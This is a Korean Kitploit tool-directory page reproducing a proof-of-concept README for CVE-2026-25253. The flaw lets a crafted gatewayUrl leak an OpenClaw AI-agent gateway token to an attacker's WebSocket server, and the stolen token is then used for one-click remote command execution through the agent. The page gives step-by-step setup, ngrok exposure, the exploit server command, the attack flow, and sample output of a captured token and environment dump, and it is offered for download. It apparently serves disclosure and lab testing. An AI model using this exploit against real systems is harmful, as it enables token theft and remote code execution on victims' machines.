Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-25253 — OpenClaw Authentication Token Exfiltration | Kitploit
도구/GitHubGitHub/eqstlab/cve-2026-25253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw Authentication Token Exfiltration

저장소 보기
23개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-25253 OpenClaw 1-Click RCE

★ CVE-2026-25253 OpenClaw 1-Click Remote Code Execution PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

설명

CVE-2026-25253 : OpenClaw 인증 토큰 유출 취약점

설명: OpenClaw(일명 clawdbot 또는 Moltbot) v2026.1.29 이전 버전에서 공격자가 조작된 gatewayUrl 쿼리 문자열 값을 Control UI에 제공하여 저장된 게이트웨이 인증 토큰을 유출할 수 있습니다. 이는 검증이나 사용자 확인 없이 자동으로 WebSocket 연결을 설정합니다. 이로 인해 승인되지 않은 게이트웨이 접근과 원클릭 원격 코드 실행이 발생할 수 있습니다.

요구 사항

  • Docker (Windows의 Docker Desktop)
  • Python 3.x (공격자 측)

파일

  • Dockerfile — OpenClaw 취약 환경 구축
  • templates/ — 익스플로잇에 사용되는 악성 웹 페이지
  • config.txt — 피해자 환경에서 사용되는 OpenClaw 설정
  • exploit.py — 익스플로잇 서버
  • requirements.txt — PoC 종속성

환경 설정

  1. Docker 이미지 빌드
root@kitploit:~
docker build -t openclaw-vuln .
  1. 환경 실행 (Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. SSH 터널 생성
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • 비밀번호: openclawlab
  1. OpenClaw Control UI 접속 브라우저에서 다음 URL을 엽니다
root@kitploit:~
http://127.0.0.1:18789/
  1. 게이트웨이 토큰 d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 입력
  2. Connect 클릭
  3. Config 탭 열기
  4. config.txt의 내용 붙여넣기
  5. API 키 필드를 사용자의 OpenAI API 키로 교체
  6. 설정 저장
  7. 에이전트가 정상적으로 응답하는지 확인

개념 증명 (PoC)

  1. 종속성 설치 (공격자 측)
root@kitploit:~
pip3 install -r requirements.txt
  1. 익스플로잇 서버를 HTTPS로 노출
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • 생성된 포워딩 호스트 이름 복사
  1. 익스플로잇 서버 실행
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

예시:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. 공격 트리거
  1. 익스플로잇 서버가 노출한 악성 페이지 열기
  2. 피해자의 페이지 상호작용 시뮬레이션
  3. 브라우저에서 익스플로잇 흐름 실행

공격 흐름

  1. 악성 URL이 피해자 Control UI의 gatewayUrl을 변경합니다.
  2. 브라우저가 공격자가 제어하는 WebSocket 엔드포인트에 자동으로 연결됩니다.
  3. 게이트웨이 인증 토큰이 공격자에게 유출됩니다.
  4. 악성 페이지가 도난당한 토큰을 사용하여 피해자 로컬 OpenClaw 게이트웨이로 새로운 WebSocket 연결을 엽니다.
  5. 에이전트를 통해 명령 실행 요청이 전송됩니다.
  6. 실행 결과가 공격자 서버로 반환됩니다.

예상 결과

  • 피해자 브라우저가 악성 WebSocket 흐름으로 리디렉션됩니다.
  • 게이트웨이 인증 토큰이 공격자에게 포착됩니다.
  • 공격자가 OpenClaw를 통해 명령 실행 요청을 보낼 수 있습니다.
  • 명령 출력이 공격자 서버로 반환됩니다.

샘플 출력

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

참고 사항

  • 이 PoC는 OpenClaw 2026.1.24-1을 대상으로 합니다.
  • 익스플로잇 체인은 Control UI의 취약한 gatewayUrl 처리에 의존합니다.
  • 원격 피해자 접근을 위해 악성 페이지는 HTTPS로 제공되어야 합니다.
  • 로컬 OpenClaw 게이트웨이는 피해자 브라우저를 브릿지로 통해 접근됩니다.

EQST 인사이트

저희는 매월 CVE 및 악성코드 분석을 발행합니다. 관심이 있으시면 아래 링크를 통해 저희 발행물을 확인해 주세요.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
도구 다운로드